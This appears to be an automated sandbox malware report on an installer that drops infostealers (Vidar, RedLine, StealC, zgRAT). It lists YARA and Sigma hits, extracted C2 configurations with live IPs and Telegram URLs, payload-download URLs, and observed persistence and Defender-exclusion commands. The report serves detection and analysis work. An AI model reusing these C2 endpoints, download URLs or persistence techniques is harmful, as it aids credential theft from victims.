11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x43991:$s1: file:/// 0x438ed:$s2: {11111-22222-10009-11112} 0x43921:$s3: {11111-22222-50001-00000} 0x4092d:$s4: get_Module 0x3b0ab:$s5: Reverse 0x3bd47:$s6: BlockCopy 0x3afb1:$s7: ReadByte 0x439a3:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.4MZEKMRe7m6bc8qivCccLsq8.exe.3b9edf8.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x45791:$s1: file:/// 0xb17b1:$s1: file:/// 0x456ed:$s2: {11111-22222-10009-11112} 0xb170d:$s2: {11111-22222-10009-11112} 0x45721:$s3: {11111-22222-50001-00000} 0xb1741:$s3: {11111-22222-50001-00000} 0x4272d:$s4: get_Module 0xae74d:$s4: get_Module 0x3ceab:$s5: Reverse 0xa8ecb:$s5: Reverse 0x3db47:$s6: BlockCopy 0xa9b67:$s6: BlockCopy 0x3cdb1:$s7: ReadByte 0xa8dd1:$s7: ReadByte 0x457a3:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0xb17c3:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.437bed8.3.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
16.2.4Q6k8SlqG7M24bYO3UgMWICf.exe.73ab00.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.437bed8.3.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
12.0.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.b80000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.0.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.b80000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.MSBuild.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 33 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe, ParentImage: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe, ParentProcessId: 2884, ParentProcessName: ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2096, ProcessName: powercfg.exe

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 149.154.167.99, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7080, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49773

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe, ProcessId: 1464, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe, ProcessId: 1464, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1719859269.0326595_setup.exe, ProcessId: 5720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe, ParentImage: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe, ParentProcessId: 2884, ParentProcessName: ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto", ProcessId: 7284, ProcessName: sc.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc, CommandLine: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc, ProcessId: 5820, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll#	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://helsinki-dtc.com/updates/yd/wrtzr_yt_a_1/win/version.txt?ZOmFPgPUTVZNbWpVqvSvPLQtsthTrEhbx	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dllq	Avira URL Cloud: Label: malware
Source: http://helsinki-dtc.com/updates/yd/yt_wrtzr_1/win/version.txt?BaGHTJrEOqpSoOUUbPmVVgUlkCFxoVbnT	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00	Avira URL Cloud: Label: phishing
Source: http://www.rapidfilestorage.com/clrls/cl_rls.json	Avira URL Cloud: Label: malware
Source: http://www.rapidfilestorage.com/updates/yd/wrtzr_yt_a_1/win/version.txt?lkNOHJiXnxKRAffVlKrZwoIEmkviEhCxR	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeAppData	Avira URL Cloud: Label: phishing
Source: http://www.rapidfilestorage.com/updates/yd/yt_wrtzr_1/win/version.txt?BAxskCrAzBkAQLhyBAyQiyrSwfaJVtVcO	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe	Avira URL Cloud: Label: phishing
Source: http://77.105.133.27/download/th/space.php	Avira URL Cloud: Label: malware
Source: http://77.105.133.27/download/123p.exe	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php	Avira URL Cloud: Label: malware
Source: http://api2.check-data.xyz/api2/google_api_ifi	Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exew$	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe	Avira: detection malicious, Label: HEUR/AGEN.1315075
Source: C:\ProgramData\FCBFBGDBKJ.exe	Avira: detection malicious, Label: HEUR/AGEN.1317026

Found malware configuration

Source: 0000000C.00000002.2451450016.0000000004314000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199707802586", "https://t.me/g067n"], "Botnet": "4e7fbe36a69903b4dfa6c1b767f4bf81"}
Source: 17.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["77.105.135.107:3445"], "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe.6256.9.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "85.28.47.4/920475a59bac849d.php"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\FCBFBGDBKJ.exe	ReversingLabs: Detection: 68%
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	ReversingLabs: Detection: 62%
Source: C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\is-JR9V0.tmp	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\MP3Doctor Free 2020\libeay32.dll (copy)	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\123p[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newsoftgnu[1].exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\super[1].exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lumma2806[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	ReversingLabs: Detection: 54%

Multi AV Scanner detection for submitted file

Source: 1719859269.0326595_setup.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\AIRP Next Stage 7.1.66\AIRP Next Stage 7.1.66.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\FCBFBGDBKJ.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 1719859269.0326595_setup.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetProcAddress
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: LoadLibraryA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: lstrcatA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: OpenEventA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CreateEventA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CloseHandle
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Sleep
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: VirtualFree
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetSystemInfo
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: VirtualAlloc
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: HeapAlloc
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetComputerNameA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: lstrcpyA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetProcessHeap
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetCurrentProcess
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: lstrlenA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ExitProcess
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetSystemTime
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: advapi32.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: gdi32.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: user32.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: crypt32.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ntdll.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetUserNameA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CreateDCA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetDeviceCaps
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ReleaseDC
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: sscanf
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: NtQueryInformationProcess
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: VMwareVMware
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: HAL9TH
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: JohnDoe
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: DISPLAY
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetFileAttributesA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GlobalLock
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: HeapFree
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetFileSize
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GlobalSize
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: IsWow64Process
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Process32Next
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetLocalTime
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: FreeLibrary
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetVolumeInformationA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: Process32First
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetLocaleInfoA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetModuleFileNameA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: DeleteFileA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: FindNextFileA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: LocalFree
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: FindClose
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: LocalAlloc
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetFileSizeEx
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ReadFile
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SetFilePointer
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: WriteFile
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CreateFileA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: FindFirstFileA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CopyFileA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: VirtualProtect
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetLastError
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: lstrcpynA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: MultiByteToWideChar
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GlobalFree
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: WideCharToMultiByte
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GlobalAlloc
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: OpenProcess
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: TerminateProcess
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetCurrentProcessId
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: gdiplus.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: ole32.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: bcrypt.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: wininet.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: shlwapi.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: shell32.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: psapi.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: rstrtmgr.dll
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: SelectObject
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: BitBlt
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: DeleteObject
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CreateCompatibleDC
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GdiplusStartup
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GdiplusShutdown
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GdipDisposeImage
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GdipFree
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CoUninitialize
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CoInitialize
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CoCreateInstance
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: BCryptDecrypt
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: BCryptSetProperty
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: BCryptDestroyKey
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetWindowRect
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetDesktopWindow
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: GetDC
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: CloseWindow
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: wsprintfA
Source: 12.2.yHP2Z5SFUIZjI8pAKB_H3QUP.exe.43af908.7.raw.unpack	String decryptor: EnumDisplayDevicesA
